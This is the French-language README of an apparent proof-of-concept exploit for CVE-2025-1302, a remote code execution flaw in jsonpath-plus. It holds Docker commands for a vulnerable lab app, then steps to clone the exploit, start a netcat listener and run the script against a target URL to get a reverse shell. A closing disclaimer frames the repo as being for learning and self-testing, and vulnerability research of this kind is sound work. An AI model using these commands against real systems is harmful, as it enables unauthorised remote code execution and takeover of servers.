
JSONPath-plus Remote Code Execution
★ CVE-2025-1302 JSONPath-plus RCE PoC ★
https://github.com/user-attachments/assets/5d791540-ef6c-4cd0-bd25-7a1dbbd194fb
docker build -t jsonpath:10.2.0 .
docker run --rm --name jsonpath -p 3000:3000 jsonpath:10.2.0
localhost:3000

Les versions du package jsonpath-plus antérieures à 10.3.0 sont vulnérables à l'exécution de code à distance (RCE) en raison d'une désinfection incorrecte des entrées. Un attaquant peut exécuter du code arbitraire sur le système en exploitant l'utilisation par défaut non sécurisée du mode eval='safe'. Remarque : Ceci est causé par un correctif incomplet pour CVE-2024-21534.
git clone https://github.com/EQSTLab/CVE-2025-1302.git
cd CVE-2025-1302
pip install -r requirements.txt
nc -l -p <LPORT>
python3 CVE-2025-1302.py -u <URL_TO_EXPLOIT> -i <LHOST> -p <LPORT>


Ce dépôt n'est pas destiné à être un exploit RCE pour CVE-2025-1302. Le but de ce projet est d'aider les personnes à apprendre cette vulnérabilité, et éventuellement tester leurs propres applications.
Nous publions une analyse des CVE et des malwares une fois par mois. Si vous êtes intéressé, veuillez suivre les liens ci-dessous pour consulter nos publications. https://www.skshieldus.com/eng/business/insight.do